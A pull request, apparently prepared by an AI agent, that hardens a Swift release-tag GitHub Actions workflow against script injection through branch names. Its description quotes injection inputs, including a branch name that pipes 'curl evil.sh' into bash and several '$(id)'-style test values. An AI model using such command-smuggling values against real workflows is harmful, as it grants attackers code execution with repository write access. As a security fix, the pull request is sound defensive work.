### PR TITLE
fix(security): harden Swift release tag workflow against script injection (V2314976107)

### DIFF
--- a/.github/workflows/publish-tag-swift-release.yml
+++ b/.github/workflows/publish-tag-swift-release.yml
@@ -20,16 +20,27 @@ jobs:
 
       - name: Extract version from branch name
         id: version
+        env:
+          BRANCH: ${{ github.event.pull_request.head.ref }}
         run: |
-          BRANCH="${{ github.event.pull_request.head.ref }}"
           VERSION="${BRANCH#release/swift-}"
+
+          if ! printf '%s' "$VERSION" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+([-+][0-9A-Za-z.-]+)?$'; then
+            echo "ERROR: refusing to tag: '$VERSION' is not a valid SemVer version" >&2
+            exit 1
+          fi
+          if [ "$(printf '%s' "$VERSION" | wc -l)" -ne 0 ]; then
+            echo "ERROR: refusing to tag: version contains a newline" >&2
+            exit 1
+          fi
+
           echo "version=$VERSION" >> "$GITHUB_OUTPUT"
           echo "Tagging swift@${VERSION}"
 
       - name: Create tag
+        env:
+          VERSION: ${{ steps.version.outputs.version }}
         run: |
-          VERSION="${{ steps.version.outputs.version }}"
-
           git config user.name "github-actions[bot]"
           git config user.email "github-actions[bot]@users.noreply.github.com"
           git tag "swift@${VERSION}" -m "Swift SDK ${VERSION}"


### PR DESCRIPTION
Resolves AWS AppSec finding V2314976107 (Talos 21ef4458-0171-49f2-8ba0-fa9b38189425, rule acat-guru/GithubWorkflowIdentifier).

## What was wrong

`.github/workflows/publish-tag-swift-release.yml` interpolated the PR head branch name directly into a `run:` shell body:

```yaml
run: |
  BRANCH="${{ github.event.pull_request.head.ref }}"
```

GitHub substitutes that expression as raw text *before* the shell parses the script, so the branch name is executed as shell source, not read as data. Any contributor who can open a PR from a branch named e.g. `release/swift-0.1.1;curl evil.sh|bash` gets arbitrary code execution in the job.

This job is not a no-op target: the workflow declares `permissions: contents: write` and `actions/checkout` persists that credential into `.git/config`, so injected code inherits a write-scoped token.

Introduced in 314a7f20 (2026-07-07), vulnerable since birth.

## What this changes

1. **Env indirection.** Both untrusted values now enter through `env:` instead of being interpolated into the script. `env:` values are passed as environment variables, so the shell sees `$BRANCH` / `$VERSION` as *data* — there is no substitution-before-parse step to exploit.
2. **SemVer allowlist.** The extracted version must match `^[0-9]+\.[0-9]+\.[0-9]+([-+][0-9A-Za-z.-]+)?$` or the job fails closed. This rejects every shell metacharacter.
3. **Newline guard.** `grep -Eq` anchors match *per line*, so a multi-line value would otherwise pass on its first line and smuggle extra content into `$GITHUB_OUTPUT`. An explicit `wc -l` check closes that.

No GitHub expression remains inside any `run:` body — verified by parsing the YAML and inspecting the shell bodies as AST nodes, not by regex over the raw text.

## Deliberately NOT changed

`persist-credentials: false` was **not** added to the checkout step. This workflow's whole purpose is `git push origin "swift@$VERSION"`, which authenticates with exactly the credential `actions/checkout` persists. Disabling it would break releases. Hardening that would require switching the tag creation to the REST API — a separate, larger change.

## Verification

Behaviour on legitimate input is unchanged — `release/swift-0.1.1` still produces tag `swift@0.1.1`.

Accepted: `0.1.1`, `0.2.0-beta.1`, `1.0.0+build.5`
Rejected: `0.1.1;id`, `0.1.1$(id)`, `` 0.1.1`id` ``, `0.1.1 && curl evil.sh | bash`, and a newline-injected `version=pwned`

## Note for reviewers — this does not fully close the ticket

ACAT scans **every branch**, not just `main`. 111 of 191 branches carry the byte-identical vulnerable blob. Merging this fixes `main`; the ~24 Dependabot branches and `changeset-release/main` then regenerate off `main` on their own.

Four **open** PRs still carry the vulnerable file and need this change rebased in before the finding clears: #297, #295, #261, #252. Three branches whose PRs already merged (#210, #211, #204) can simply be deleted. Note that `git merge-base --is-ancestor` is unreliable here — this repo squash-merges, so it reports NOT_MERGED even for merged branches; use PR state instead.

---
🤖 Prepared by Roko AI Agent during investigation of V2314976107
